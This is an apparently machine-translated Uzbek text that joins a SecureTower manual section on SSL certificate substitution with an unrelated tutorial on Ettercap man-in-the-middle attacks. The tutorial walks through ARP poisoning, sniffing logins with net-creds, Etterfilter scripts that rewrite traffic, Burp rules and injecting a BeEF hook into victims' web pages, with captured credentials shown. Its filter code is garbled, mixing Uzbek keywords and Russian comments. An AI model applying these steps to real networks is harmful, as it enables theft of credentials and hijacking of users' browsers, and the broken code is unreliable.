Yoqilganda, barcha trafik (shifrlangan va shifrlanmagan) yoki faqat shifrlangan agent himoyalangan veb-sessiyalarda uzatiladigan ma'lumotlarni ushlab turishni ta'minlash uchun SSL sertifikatini buzish texnologiyasidan foydalanadi. Server bilan xavfsiz ulanishni o'rnatishda agent asl server sertifikatini xuddi shu nomdagi, lekin agentning ildiz sertifikati tomonidan berilgan sertifikat bilan almashtiradi. Tizim ildiz sertifikati sifatida imzolash vakolatiga ega boʻlgan ham oldindan oʻrnatilgan, ham foydalanuvchi tomonidan yaratilgan sertifikatdan foydalanish imkonini beradi.

Tizim sertifikatni serverga ulash orqali tegishli serverlarning (saytlar, dasturlar) seanslarini ushlab turishda almashtirish uchun ma'lum sertifikatlarni qo'lda o'rnatish imkonini beradi.

Ba'zi hollarda, asl bo'lmagan sertifikatdan foydalanish server bilan shifrlangan ulanishni o'rnatishni imkonsiz qilishi mumkin. Bunday holda, tegishli serverlarni to'xtatib turishdan chiqarib tashlash kerak, ya'ni. bunday serverlarga ulanishda SSL sertifikatlarini almashtirishni taqiqlash. Bu bunday saytlar yoki dasturlarning funksiyalarini tiklaydi, lekin ular uchun shifrlangan trafik to'xtatilmaydi.

SSL trafikni ushlab turishni sozlash uchun:

Sozlamalar oynasida qabul qilinadigan ushlab turish rejimini tanlang:

• Foydalanuvchi kompyuteriga o'rnatilganda agent avtomatik ravishda ildiz SSL sertifikatini yaratishi uchun opsiyani tanlang Avtomatik rejim. Yaratilgan ildiz sertifikati ishonchli sertifikat emitent maʼlumotlar bazasiga joylashtiriladi va agent tomonidan avtomatik ravishda Falcongaze SecureTower emitent nomi bilan sukut boʻyicha imzolangan bolalar sertifikatlarini chiqarish uchun foydalaniladi.

Ulanish xavfsizligi ma'lumotlarida paydo bo'ladigan sertifikat emitentining nomini o'zgartirish uchun SSL sertifikatidagi Ism maydoniga kerakli nomni kiriting.

• Shifrlangan trafikni ushlab turishda maxsus SSL sertifikatidan ildiz sertifikati sifatida foydalanish uchun Maxsus rejim opsiyasini tanlang. Foydalanuvchi sertifikati avvaldan yaratilishi va tizim ma'lumotlar bazasiga qo'shilishi kerak. Tizim ma'lumotlar bazasidan sertifikatni belgilash uchun ochiladigan ro'yxatdan Foydalanuvchi sertifikati nomini tanlang yoki sertifikat fayllarini qo'shish va foydalanuvchi sertifikatlari tugmasini bosing. shaxsiy kalit tizim ma'lumotlar bazasiga.

Ochilgan oynada Sertifikat qo'shish tugmasini bosing va quyidagi usullardan biri yordamida sertifikat va asosiy fayllarni belgilang:

Qo'shish jarayonini davom ettirish uchun Foydalanuvchi sertifikatlarini qo'shish oynasida "Keyingi" tugmasini bosing. Ochilgan oynada kiriting noyob ism, qo'shilgan sertifikat va sharhni imzolaydi (ixtiyoriy).

Jarayonni yakunlash uchun Finish tugmasini bosing. Sertifikat SecureTower tizimining foydalanuvchi sertifikatlari ma'lumotlar bazasiga qo'shiladi. Qo'shishni yakunlash uchun OK tugmasini bosing. Qo'shilgan foydalanuvchi sertifikati agent tomonidan avtomatik ravishda ishonchli ijodkorlar ma'lumotlar bazasiga joylashtiriladi (agar bu tarmoq ma'muri tomonidan ilgari qilinmagan bo'lsa) va keyinchalik bolalar sertifikatlarini chiqarish uchun ishlatiladi.

Eslatma.

Foydalanuvchi rejimidan foydalanganda, tarmoq ma'muriga foydalanuvchi sertifikatini tarmoqdagi barcha kompyuterlarga tarqatish tavsiya etiladi guruh siyosati yoki qo'lda. Bu sertifikatlarning muvaffaqiyatli autentifikatsiya qilinishini ta'minlaydi. Aks holda, sertifikat agent tomonidan avtomatik ravishda ishonchli sertifikatlar do'koniga qo'shiladi.

Server-sertifikat mosligini aniqlash uchun Sertifikat bog'lash tugmasini bosing va quyidagi tavsiyalarga amal qiling:

• Yorliqdagi ma'lum bir server ildiz sertifikatiga ulanish uchun Ildiz sertifikatlari, Sayt uchun sertifikat qo'shish tugmasini bosing. Xost nomini kiriting ( Domen nomi), Xost nomi (IP manzili) maydonida qaysi bolalar sertifikatlari beriladi va ildiz sertifikati bog'lanadi. Ildiz sertifikat maydonining ochiladigan ro'yxatidan oldindan o'rnatilgan ildiz sertifikatlaridan birini tanlang yoki foydalanuvchi kompyuterida sertifikat va shaxsiy kalit fayllarini qo'shish va belgilash uchun Foydalanuvchi sertifikatlari tugmasini bosing.
• Mavjud sertifikatni ma'lum bir serverga ulash uchun Foydalanuvchi sertifikatlari yorlig'ini tanlang. Agent ushbu yorliqda ko'rsatilgan serverlar uchun yangi bolalar sertifikatlarini yaratmaydi, lekin almashtirish protseduralari uchun foydalanuvchi tomonidan belgilangan sertifikatlardan foydalanadi. Ochilgan oynada Xost nomi (IP manzili) maydoniga sertifikat bog'lanadigan xost nomini (domen nomi) kiriting. Sertifikat: maydonidagi ochiladigan roʻyxatdan sertifikatlardan birini tanlang (agar sertifikatlar ilgari qoʻshilgan boʻlsa) yoki roʻyxatdan foydalanuvchi sertifikatlarini tanlash uchun “Foydalanuvchi sertifikatlari” tugmasini bosing yoki foydalanuvchi sertifikati va shaxsiy kalit fayllarini qoʻshing va belgilang. kompyuter.

Eslatma.

Xost nomi (IP manzili) maydonini to'ldirish uchun siz xostning IP-manzilidan foydalanishingiz mumkin, lekin faqat ulanish vaqtida xost nomi aniqlanmagan va faqat IP-manzil ma'lum bo'lgan hollarda.

Sertifikatni almashtirish jarayonidagi istisnolar bilan ishlash uchun SSL Server istisnolari tugmasini bosing.

Istisno menejeri oynasi sukut bo'yicha almashtirish jarayonidan chiqarib tashlangan serverlar (xostlar) ro'yxatini ko'rsatadi. Yangi istisno qo'shish uchun Istisno qo'shish tugmasini bosing.

Ochilgan dialog oynasining kiritish maydoniga server (xost) nomini (masalan, accounts.google.com) katta-kichik harflarga qarab kiriting va Qo'shish tugmasini bosing. Tizim niqob yordamida nomlarni kiritish imkonini beradi (? va * belgilariga ruxsat beriladi, masalan, *.microsoft.* dan foydalanish istisnolar ro‘yxatidagi Microsoft resurslarini takrorlashdan saqlaydi) bir oilaning resurslarini chiqarib tashlash uchun. Siz kiritgan ism istisnolar ro'yxatida paydo bo'ladi.

Keyinchalik, istisno rejimini tanlashingiz kerak: sertifikatlarni faqat yuqorida ko'rsatilgan SSL serverlari uchun almashtiring yoki yuqorida ko'rsatilganlardan tashqari barcha serverlar uchun SSL sertifikatlarini almashtiring. Birinchi holda, tizim faqat istisnolar ro'yxatida sanab o'tilgan serverlar uchun sertifikatlarni almashtiradi (va shuning uchun tegishli trafikni ushlab turishi mumkin). Qolganlarning barchasi uchun sertifikatlar almashtirilmaydi va tegishli shifrlangan trafikni ushlab turish imkonsiz bo'ladi. Ikkinchi holda, tizim istisnolar ro'yxatida ko'rsatilganlardan tashqari barcha serverlar uchun sertifikatlarni almashtiradi.

Istisnolardan tashqari boshqa operatsiyalarni bajarish uchun paragrafdagi tegishli tavsiyalarga amal qiling

Ettercap uchun muqobillar

Ettercap eng ko'p mashhur dastur odam-in-the-o'rta hujum uchun, lekin u eng yaxshi? Butun ko'rsatmalar davomida siz Ettercap deyarli hech qachon yolg'iz ishlatilmasligini, u yoki bu dastur doimo u bilan trafikni qayta ishlash zanjirida yaratilganligini ko'rasiz. Ehtimol, bu moslashuvchanlikni oshiradi; umuman olganda, bu yondashuv UNIX asosida yotadi - bitta dastur bitta vazifani bajaradi va oxirgi foydalanuvchi birlashtiradi. turli dasturlar istalgan natijaga erishish uchun. Ushbu yondashuv bilan dastur kodini saqlash osonroq, bunday miniatyura "g'ishtlardan" siz har qanday murakkablik va moslashuvchan tizimni qurishingiz mumkin. Biroq, beshga ega ochiq konsollar Bilan turli vazifalar, dasturlarning ishi bitta natijaga erishishga qaratilgan - bu juda qulay emas, bu shunchaki murakkabroq, qaysidir bosqichda xato qilish ehtimoli bor va butun tuzilgan tizim behuda ishlaydi.

Net-Creds hidi:

• Tashrif qilingan URL manzillar
• POST soʻrovlari yuborildi
• HTTP shakllaridan kirishlar/parollar
• asosiy HTTP autentifikatsiyasi uchun loginlar/parollar
• HTTP qidiruvi
• FTP loginlari/parollari
• IRC loginlari/parollari
• POP loginlari/parollari
• IMAP loginlari/parollari
• Telnet loginlari/parollari
• SMTP loginlari/parollari
• SNMP hamjamiyat qatori
• HTTP, SMB, LDAP va boshqalar kabi barcha qo'llab-quvvatlanadigan NTLMv1/v2 protokollari.
• Kerberos

Tutib olinganlarning yaxshi tanlovi va driftnet bu borada soddaroq - u faqat ushlab olingan tasvirlarni ko'rsatadi.

Mashinani yo'naltirish rejimiga o'tkazing.

Echo "1" > /proc/sys/net/ipv4/ip_forward

Grafik interfeys (-G) bilan Ettercap-ni ishga tushiring:

Ettercap-G

Endi Xostlarni tanlang, Xostlarni skanerlash pastki bandi mavjud. Tekshirish tugallangandan so'ng, Xostlar ro'yxatini tanlang:

Target1 sifatida marshrutizatorni tanlang (Maqsad 1ga qo'shing), Target2 sifatida siz hujum qiladigan qurilmani tanlang (Maqsad 2ga qo'shing).

Ammo bu erda birinchi muammo paydo bo'lishi mumkin, ayniqsa uy egalari ko'p bo'lsa. IN turli ko'rsatmalar, shu jumladan yuqorida keltirilgan videoda mualliflar maqsadli mashinaga kirishadi (hammada negadir Windows mavjud) va buyruq yordamida ushbu mashinaning IP-ga qarang. mahalliy tarmoq. Qabul qiling, bu variant haqiqiy sharoitlar uchun qabul qilinishi mumkin emas.

dan foydalanib skanerdan o'tkazsangiz, xostlar haqida, aniqrog'i, tarmoq kartasi ishlab chiqaruvchisi haqida qo'shimcha ma'lumotlarni olishingiz mumkin:

Nmap -sn 192.168.1.0/24

Agar ma'lumotlar hali ham etarli bo'lmasa, siz OSni aniqlash uchun skanerlashingiz mumkin:

Nmap -O 192.168.1.0/24

Ko'rib turganimizdek, IP 192.168.1.33 bo'lgan mashina Windows bo'lib chiqdi, agar bu yuqoridan belgi bo'lmasa, unda bu nima? 😉 LOL

Bu biz ikkinchi maqsad sifatida qo'shayotgan narsamiz.

Endi Mitm menyusiga o'ting. U erda ARP zaharlanishini tanlang... Sniff masofaviy ulanishlar uchun katakchani belgilang.

Biz hosilni yig'ishni boshlaymiz, bir oynada ishga tushiramiz

Net-kreditlar

boshqasida (har ikkala dastur ham variantlarsiz ishga tushirilishi mumkin)

Driftnet

Ma'lumotlarni yig'ish darhol boshlandi:

O'ng tomonda driftnet boshqa oynani ochdi, unda tutilgan tasvirlar ko'rsatiladi. Net-creds oynasida biz tashrif buyurilgan saytlar va ushlangan parollarni ko'ramiz:

Ko'rish menyusida biz "Ulanishlar" va "Profillar" yorliqlariga kirishimiz mumkin. Shuningdek, siz IP manzillarini hal qilish katagiga belgi qo'yishingiz mumkin. Ulanishlar, albatta, aloqadir. Ettercap o'zi topgan har bir xost uchun profillarni xotirada to'playdi. U erda foydalanuvchilar va parollar yig'iladi. Bunday holda, olingan hisob ma'lumotlari (parollar) bo'lgan profillar xoch bilan belgilanadi:

Profillarga juda ko'p ishonishning hojati yo'q - masalan, FTP va boshqa xizmatlar uchun ushlangan login va parollar belgilanadi, buning uchun dastur hisob ma'lumotlari sifatida olingan ma'lumotlarni aniq talqin qilishi mumkin. Bunga, masalan, asosiy autentifikatsiya ma'lumotlari, veb-shakllarga kiritilgan loginlar va parollar kirmaydi.

Ulanishlarda eng istiqbolli ma'lumotlar yulduzcha bilan belgilanadi:

Tafsilotlarni ko'rish uchun ushbu yozuvlarni ikki marta bosishingiz mumkin:

Roʻyxat boʻylab bu yulduzlarni qidirmaslik uchun siz ushbu maydon boʻyicha saralashingiz mumkin va ularning barchasi yuqori yoki pastda koʻrinadi:

Tugallangan asosiy autentifikatsiya:

Yandex uchun login-parol (quyida ta'kidlangan):

Bular VKontakte uchun ushlangan hisobga olish ma'lumotlari:

Bundan tashqari, eng qiziqarli ma'lumotlar pastki konsolda to'plangan:

Agar siz dastur natijalarini saqlamoqchi bo'lsangiz, quyidagi variantlardan foydalaning (Ettercap-ni ishga tushirishda kalitlarni belgilang:

Jurnalga yozish opsiyalari: -w, --pcapfile-ga yozib olingan ma'lumotlarni yozish -L, --log barcha trafikni bu joyga yozish -l, --log-info faqat passiv ma'lumotlarni yozish -m, --log-msg barcha xabarlarni yozish bu -c, --compress da log fayllari uchun gzip siqishdan foydalaning

Eslatma: Barcha sinovlarga qaramay, Ettercap filtrlari men uchun ishlamadi. Bu qo'llar, apparat xususiyatlari yoki dasturning o'zida xatolik borligini tushunish qiyin ... Lekin 0.8.2 versiyasi (hozirda eng so'nggi) uchun filtrlar bilan bog'liq muammolar haqida xato hisoboti mavjud. Umuman olganda, xato hisobotlari va forumlarga qaraganda, filtrlar tez-tez tushib ketadi yoki uzoq vaqt davomida umuman ishlamayapti. 5 oy oldin https://github.com/Ettercap/ettercap/tree/filter-improvements o'zgarishlar kiritilgan filial mavjud, ya'ni. filtrni yaxshilash (filtrni yaxshilash bilan). Ushbu filial uchun ham, ombordan versiya uchun ham turli xil sinovlar o'tkazildi, turli xil filtrlar turli sharoitlarda sinovdan o'tkazildi, ko'p vaqt sarflandi, ammo natija bo'lmadi. Aytgancha, filtrni yaxshilash versiyasini o'rnatish uchun Kali Linux buni qilishingiz kerak:

Sudo apt-get olib tashlash ettercap-grafik ettercap-common sudo apt-get install git debhelper bizon check cmake flex ghostscript libbsd-dev libcurl4-openssl-dev libgtk2.0-dev libltdl-dev libluajit-5.1-libcurlibnvde-dev libpcap-dev libpcre3-dev libssl-dev libgtk-3-dev ghostscript groff libtool libpcre3 libncurses5-dev git clone -b filter-improvements https://github.com/Ettercap/ettercap.git cd ettercap build cdfdfcs build_endmk =On ../ make sudo make install

Umuman olganda, agar sizning filtrlaringiz ishlamasa, unda siz yolg'iz emassiz. Ettercap haqidagi ko'rsatmalarda men filtrlar mavzusini o'tkazib yubora olmayman, shuning uchun ular har qanday holatda ham muhokama qilinadi.

Hozirgacha biz Ettercap-dan ARP spoofing uchun foydalandik. Bu juda yuzaki dastur. Maxsus filtrlar tufayli biz tezda aralashishimiz va trafikni o'zgartirishimiz mumkin. Filtrlar alohida fayllarda bo'lishi va foydalanishdan oldin Etterfilter dasturi yordamida kompilyatsiya qilinishi kerak. Havola berilgan hujjatlar kam ko'rinsa-da, lekin quyida keltirilgan misollar bilan birgalikda bu sizga juda qiziqarli filtrlarni yozishga imkon beradi.

Keling, birinchi filtrimizni yarataylik, u barcha tasvirlarni bu bilan almashtiradi:

Img_replacer.filter nomli faylda nusxa oling:

Agar (ip.proto == TCP && tcp.dst == 80) ( agar (qidiruv(DATA.data, "Qabul qilish-kodlash")) ( almashtiring("Qabul qilish-kodlash", "Qabul qilish-axlat!"); # Eslatma: almashtirish satri asl msg ("zapped Accept-Encoding!\n"); ) ) if (ip.proto == TCP && tcp.src == 80) ( replace("src=") bilan bir xil uzunlikda. , " src=\"http://www.irongeek.com/images/jollypwn.png\" "); almashtiring("SRC=", "src=\"http://www.irongeek.com/images/ jollypwn. png\" "); almashtiring("src=", "src=\"http://www.irongeek.com/images/jollypwn.png\" "); almashtiring("SRC=", "src= \" http://www.irongeek.com/images/jollypwn.png\" "); msg("Filtr ishga tushirildi.\n"); )

Faylni kompilyatsiya qiling:

Etterfilter img_replacer.filter -o img_replacer.ef

Kompilyatsiya natijalari:

Etterfilter 0.8.2 mualliflik huquqi 2001-2015 Ettercap Development Team 14 ta protokol jadvali yuklangan: DEKODLANGAN MA'LUMOT udp tcp esp gre icmp ipv6 ip arp wifi fddi tr va 13 ta konstanta yuklangan: VRRP OSPF ESPIC GRE UDP IPCPIP IPCP6 fayl "img_replacer.filter" bajarildi. Meta-daraxtni ochish tugallandi. Yorliqlarni haqiqiy ofsetlarga aylantirish amalga oshirildi. Chiqishni "img_replacer.ef" ga yozish tugallandi. -> 18 ta ko'rsatmalarga kodlangan skript.

-F kaliti dasturga filtrni kalitdan keyingi fayldan yuklashni aytadi. Kompilyatsiyadan so'ng, filtrli yangi faylimiz nomi img_replacer.ef bo'ladi, shuning uchun buyruq quyidagi shaklni oladi:

Ettercap -G -F img_replacer.ef

Eslatma: Veb-trafikni kuzatayotganingizda, siz ko'rgan paketlar shifrlangan shaklda bo'lishi mumkin. Uchun samarali ish filtrlar, Ettercap oddiy matnli trafikni talab qiladi. Ba'zi kuzatishlarga ko'ra, veb-sahifalar foydalanadigan kodlash turi "Qabul qilish-kodlash: gzip, deflate"

Quyida kodlashni qayta yozadigan, oddiy matn ko'rinishidagi aloqani majburlaydigan filtr mavjud:

Agar (ip.proto == TCP && tcp.dst == 80) ( agar (search(DATA.data, "gzip"))) ( replace("gzip", " "); # eslatma: almashtirilgan qatorda to'rtta bo'sh joy msg ("whited out gzip\n"); ) ) if (ip.proto == TCP && tcp.dst == 80) (if (search(DATA.data, "deflate"))) ( replace("deflate", " "); # eslatma: almashtirilgan qatorda etti bo'sh joy msg("oqartirilgan deflate\n"); ) )

Filtrlarni yozish sintaksisi batafsil tavsiflangan va keyin yana bir nechta misollar mavjud:

# paketdagi matnni almashtirish: agar (ip.proto == TCP && qidiruv(DATA.data, "lol"))( replace("lol", "smh"); msg("filtr ishga tushirildi"); ) # ko'rsatish xabar , agar tcp porti 22 bo'lsa if (ip.proto == TCP) ( if (tcp.src == 22 || tcp.dst == 22) ( msg("SSH paketi\n"); ) ) # yozib oling butun telnet trafigini, shuningdek, har bir paket uchun ./programni bajaring if (ip.proto == TCP) ( if (tcp.src == 23 || tcp.dst == 23) ( log(DATA.data, "./)" logfile.log "); exec("./program"); ​​) ) # agar httpdan tashqari barcha trafikni qayd etish (ip.proto == TCP && tcp.src != 80 && tcp.dst != 80) ( log (DATA.data , "./logfile.log"); ) # paketli foydali yuk bo'yicha ba'zi operatsiyalar, agar (DATA.data + 20 == 0x4142) ( DATA.data + 20 = 0x4243; ) boshqacha ( DATA.data = " modified"; DATA .data + 20 = 0x4445; ) # "ettercap" bo'lgan barcha paketlarni tashlab yuboring if (search(DECODED.data, "ettercap")) ( msg("kimdir biz haqimizda gapiryapti...\n") ; drop( ); kill(); ) # if (ip.proto == TCP) (if (tcp.src == 22) iborasiga mos keladigan shifrlangan ssh paketlarini yozib oling. tcp.dst == 22) ( if (regex(DECODED.data, ".*login.*")) ( log(DECODED.data, "./decrypted_log"); ) ) ) # o'ldirish paketlari agar (ip.ttl)< 5) { msg("The packet will die soon\n"); } # то же самое для IPv6, но делая тривиальный тест убеждаемся, что перед нами действительно IPv6 пакеты if (eth.proto == IP6 && ipv6.hl < 5) { msg("The IPv6 packet will die soon\n"); } # сравнение строки на данный сдвиг if (DATA.data + 40 == "ette") { log(DATA.data, "./logfile"); } # вставить файл после указанного пакета if (tcp.src == 21 && search(DATA.data, "root")) { inject("./fake_response"); } # целиком заменить пакет на другой if (tcp.src == 23 && search(DATA.data, "microsoft")) { drop(); inject("./fake_telnet"); } # Изменение бинарных данных используя внешнюю программу if (udp.dst == 53 && pcre_regex(DATA.data, ".*\x03com\x00.*")) { log(DATA.data, "/tmp/payload"); drop(); execinject("/bin/sed "s/\x03com\x00/\x02my\x04page\x02de\x00/g" /tmp/payload"); udp.len += 7; exec("/bin/rm /tmp/payload"); msg("faked"); } # фильтровать только указанный IP адрес if (ip.src == "192.168.0.2") { drop(); } # делать то же самое для IPv6 if (ipv6.src == "2001:db8::1") { drop(); } # комбинируем IPv4 и IPv6 if (eth.proto == IP && ip.dst == "192.168.0.2") { msg("drop IPv4"); drop(); } if (eth.proto == IP6 && ipv6.dst == "2001:db8::1") { msg("drop IPv6"); drop(); } # транслировать tcp пакеты с порта 80 на 81 if (tcp.dst == 80) { tcp.dst -= 1; tcp.dst += 2; } # найти и покалечить пакеты ESP if (ip.proto == ESP) { DATA.data = "DEADDECAF"; }

Biz Ettercap va Burp-ni 1.2-bandda yoki 2.2-bandda tavsiflanganidek ishga tushiramiz.

Burp-da Proksi -> Variantlar-ga o'ting. Biz u erda "Match" va "Replace" ni topamiz. Yangi qoida qo'shish uchun Qo'shish tugmasini bosing.

• So'rov sarlavhasi - so'rov sarlavhasi
• So'rov organi - so'rov organi
• Javob sarlavhasi - javob sarlavhasi
• Javob tanasi - javob organi
• So'rov parametri nomi - So'rov parametri nomi
• Param qiymatini so'rash - Parametr qiymatini so'rash
• So'rovning birinchi qatori - so'rovning birinchi qatori

Agar uzatilgan ma'lumotlarni o'zgartirish kerak bo'lsa GET usuli, keyin bu sarlavhalar uchun amal qiladi.

HTML belgilashda bosh (bosh tegi) kabi narsa ham mavjud. Yuqorida aytib o'tilganlarning bu nomga hech qanday aloqasi yo'q. Biroz yuqoriroq biz paket sarlavhalari haqida gapiramiz. Agar siz HTML sahifasining mazmunini o'zgartirmoqchi bo'lsangiz, bosh tegning mazmunini (masalan, sarlavha) o'zgartirmoqchi bo'lsangiz ham, har doim "So'rov" sarlavhasi o'rniga "Javob tanasi" ni tanlashingiz kerak.

Agar siz tanish bo'lmasangiz muntazam iboralar, keyin, printsipial jihatdan, tashvishlanadigan hech narsa yo'q: HTML ko'p narsani kechiradi va tushunmaydigan narsani e'tiborsiz qoldiradi - siz undan foydalanishingiz mumkin. Agar siz oddiy iboralarni qanday ishlatishni bilsangiz, men sizni hurmat qilaman.)))

Masalan, so'rov sarlavhasini Javob tanasiga o'zgartirib, yangi qoida yarataylik. Qoidaning o'zida biz o'zgartiramiz

.*

Sarlavha yo'q

Regex moslik oynasini belgilang.

Endi barcha saytlarda (HTTPSsiz) sarlavha No Sarlavha bo'ladi:

Tana tegidan keyin ixtiyoriy qatorni qo'ying (bu matndagi birinchi qator bo'ladi). So'rov sarlavhasi Javob tanasiga o'zgartirildi. Biz o'zgaramiz

Regex moslik oynasini belgilang.

Yuqori o'ng burchakda (tartibga qarab) "Men zo'rman!" yozuvi paydo bo'ladi. Siz CSS, JavaScript kodini, istalgan matnni - istalgan narsani kiritishingiz mumkin. Umuman olganda, siz sahifadan hamma narsani olib tashlashingiz va keyin uni o'zingizning tarkibingiz bilan to'ldirishingiz mumkin - barchasi sizning tasavvuringizga bog'liq.

G'oya har bir shaklni biroz o'zgartirish edi, shunda ma'lumotlar asl serverga va tajovuzkor serveriga yuboriladi (har bir shakl uchun ko'p yuborishni amalga oshirish). Ammo agar uzatilgan ma'lumotlar shifrlanmagan bo'lsa va biz unga kirish imkoniga ega bo'lsak, biz buni allaqachon ko'rib turibmiz, uni hech qanday serverga yuborishning hojati yo'q, deb o'yladi. Biroq, agar kimdir bir shakldan bir vaqtning o'zida bir nechta serverlarga ma'lumotlarni jo'natishning haqiqatan ham ishlaydigan misoliga muhtoj bo'lsa.

BeEF imkoniyatlaridan foydalanishni boshlash uchun HTML kodiga JavaScript faylini, odatda quyidagi qatorni kiritishimiz kerak:

Keyingi ikkita usul faqat ushbu qatorni joylashtirish usulida farqlanadi.

[bo'lim keyinroq tayyorlanadi]

Siz 4.2-bandda yozilganidek boshlashingiz kerak. Faqat sarlavhalarni almashtirish va saytga matn qo'shish o'rniga, biz JavaScript kodini qator shaklida amalga oshiramiz:

Mening holatimda, bu fayl IP 192.168.1.36 da 3000 portda mavjud. Fayl hook.js deb ataladi (sozlamalarda o'zgartirilishi mumkin). Bular. mening holimda qatorni kiritishim kerak:

Buni, masalan, yangi qoida yaratish, So'rov sarlavhasini Javob tanasiga o'zgartirish orqali amalga oshirish mumkin. O'zgartirish HTML kodining o'zida sodir bo'lishi kerak

Ajoyib, HTTPS-ga ega bo'lmagan har qanday veb-saytni ochganingizda, JavaScript kodi HTML kodiga kiritiladi, bu sizga bog'langan brauzer orqali ma'lumot to'plash va turli xil hujumlarni amalga oshirish imkonini beradi:

Siz ikkala Ettercap filtridan [ba'zi sabablarga ko'ra endi ishlamaydigan] va foydalanishingiz mumkin bo'lgan bajariladigan fayllarni almashtirishingiz va yuqtirishingiz mumkin. uchinchi tomon ilovalari. Masalan, BDFProxy buni tezda amalga oshirishi mumkin. Afsuski, BDFProxy hali ham 2016 yil aprel oyida Backdoor Factory yangilanishidan so'ng o'zini tuta olmayapti: libmproxy to'plami Pythonda mitmproxy deb o'zgartirildi. BDFProxy uchun libmproxy to'plami zaruriy bog'liqlikdir, bu paketsiz dastur ishga tushmaydi. Shuning uchun, endi, BDFProxy-ni "ta'mirlash" dan oldin, uni ishlatish mumkin emas, chunki Backdoor Factory o'rnatilgan bo'lsa ham, BDFProxy dasturi libmproxy kutubxonasi yo'qligidan shikoyat qiladi ...

Xuddi shunday operatsiya Burp Suite bilan ham amalga oshirilishi mumkin. Bosqichma-bosqich algoritm taqdim etilgan bo'lsa, uni ushbu bo'limda qayta yozishning ma'nosi yo'q.

Ettercap plaginlari haqida ma'lumotni topish mumkin. Plaginlar juda ko'p, quyida tavsiflanganlar menga eng qiziqarli bo'lib tuyuladi.

Ettercap ishga tushirilganda plaginlarni ulash mumkin, buning uchun variant mavjud:

P, --plugin buni ishga tushiradi

Plaginlarni GUI-dan ham yuklash mumkin:

[MATERIAL TAYYORLANGAN]

U ARP so'rovlari/javoblarini passiv kuzatish orqali shubhali ARP faoliyati haqida xabar beradi. U ARP zaharlanishiga urinishlar yoki oddiy IP ziddiyatlari yoki IP o'zgarishlari haqida xabar berishi mumkin. Agar siz xostlarning dastlabki ro'yxatini tuzayotgan bo'lsangiz, plagin aniqroq ishlaydi.

Ettercap -TQP arp_cop //

ARP-spoofingni haqiqiy aniqlashga misol:

Kengaytirish

Mial@HackWare-Mint ~ $ sudo ettercap -TQP arp_cop // mial uchun parol: ettercap 0.8.2 mualliflik huquqi 2001-2015 Ettercap rivojlantirish jamoasi Tinglash kuni: eth0 -> 08:00:27:A3:08:4A 192.168. 255.255.255.0 fe80::a00:27ff:fea3:84a/64 SSL diseksiyasi uchun etter.conf faylida yaroqli "redir_command_on" skripti kerak EUID 65534 EGID 65534... 33 ta plaginlar, 33 ta plaginlar, 5 portlar, monitorlar, 5 portlar, 50, 20, 20, 20, 20, 20. sotuvchi barmoq izi 1766 tcp OS barmoq izi 2182 maʼlum xizmatlar skanerlash uchun 255 ta xostni tasodifiylashtirish... 255 ta xost uchun butun tarmoq niqobini skanerlash... * |====== =============== =============================>

Mial@HackWare-Mint ~ $ sudo ettercap -TQP arp_cop // mial uchun parol: ettercap 0.8.2 mualliflik huquqi 2001-2015 Ettercap rivojlantirish jamoasi Tinglash kuni: eth0 -> 08:00:27:A3:08:4A 192.168. 255.255.255.0 fe80::a00:27ff:fea3:84a/64 SSL diseksiyasi uchun etter.conf faylida yaroqli "redir_command_on" skripti kerak EUID 65534 EGID 65534... 33 ta plaginlar, 33 ta plaginlar, 5 portlar, monitorlar, 5 portlar, 50, 20, 20, 20, 20, 20. sotuvchi barmoq izi 1766 tcp OS barmoq izi 2182 maʼlum xizmatlar skanerlash uchun 255 ta xostni tasodifiylashtirish... 255 ta xost uchun butun tarmoq niqobini skanerlash... * |====== =============== =============================>| 100.00 % Xostlar roʻyxatiga 3 ta xost qoʻshildi... Birlashtirilgan sniffing boshlanmoqda... Faqat matn interfeysi faollashtirilgan... Inline yordam uchun “h” tugmasini bosing arp_cop plaginini faollashtirmoqda... arp_cop: plagin ishlayapti... arp_cop: (yangi xost) ) 192.168.1.1 arp_cop: (OGOHLANTIRISH) 192.168.1.35 oʻzini 192.168.1.1 arp_cop sifatida koʻrsatmoqda: (OGOHLANTIRISH) 192.168.1.35 oʻzini 192.168.1.35 da koʻrsatmoqda (arp_cop.192.168.1.18W.) 5 ta o'zini 192.168.1.1 arp_cop sifatida ko'rsatmoqda: ( OGOHLANTIRISH ) 192.168.1.35 oʻzini 192.168.1.1 arp_cop sifatida koʻrsatmoqda: (OGOHLANTIRISH) 192.168.1.35 oʻzini 192.168.1.1 arp_cop: (OGOHLANTIRISH) 1912.168.1.1. arp_cop. _cop: (WA RNING) 192.168.1.35 da'vo qiladi 192.168 .1.1 arp_cop: (OGOHLANTIRISH) 192.168.1.35 oʻzini 192.168.1.1 arp_cop sifatida koʻrsatmoqda: (OGOHLANTIRISH) 192.168.1.35 oʻzini 192.168.1.35 (arp_cop.192.168.19W.) sifatida koʻrsatmoqda. 5 o'zini 192.1 68.1.1 arp_cop deb ko'rsatadi: ( OGOHLANTIRISH) 192.168 .1.35 oʻzini 192.168.1.1 arp_cop sifatida koʻrsatmoqda: (OGOHLANTIRISH) 192.168.1.35 192.168.1.1 arp_cop: (OGOHLANTIRISH) 1912.168.1.1. arp_cop. _cop: (Ogohlantirish) 192.1 68.1.35 da'vo qiladi 192.168.1.1 arp_cop: (OGOHLANTIRISH) 192.168.1.35 oʻzini 192.168.1.1 arp_cop sifatida koʻrsatmoqda: (OGOHLANTIRISH) 192.168.1.35 oʻzini 192.168.1.35 sifatida koʻrsatmoqda (ARP_cop.192.168.1.16. arp_cop). O'zini 192.168.1.1 arp_cop: (OGOHLANTIRISH) 192.168.1.35 oʻzini 192.168.1.1 arp_cop sifatida koʻrsatmoqda: (OGOHLANTIRISH) 192.168.1.35 oʻzini 192.168.1.1 arp_cop: (OGOHLANTIRISH) 1912.168.1.1. arp_cop. _cop: (OGOHLANTIRISH) 192.168.1.3 5 da'vo qiladi bo'lish 192.168.1.1 arp_cop: (OGOHLANTIRISH) 192.168.1.35 o'zini 192.168.1.1 arp_cop sifatida ko'rsatadi: (OGOHLANTIRISH) 192.168.1.35 192.168.1.35 bo'lishni ko'rsatadi (arp_cop.192.168.1.18W.) 5 o'zini 192.168.1.1 arp_cop deb ko'rsatadi : ( OGOHLANTIRISH) 192.168.1.35 oʻzini 192.168.1.1 arp_cop sifatida koʻrsatmoqda: (OGOHLANTIRISH) 192.168.1.35 oʻzini 192.168.1.1 arp_cop: (Ogohlantirish) 192.168.1.1. arp_cop. politsiya: (OGOHLANTIRISH) 192.168.1.35 o'zini ko'rsatadi 192. 168.1.1 arp_cop: (OGOHLANTIRISH) 192.168.1.35 oʻzini 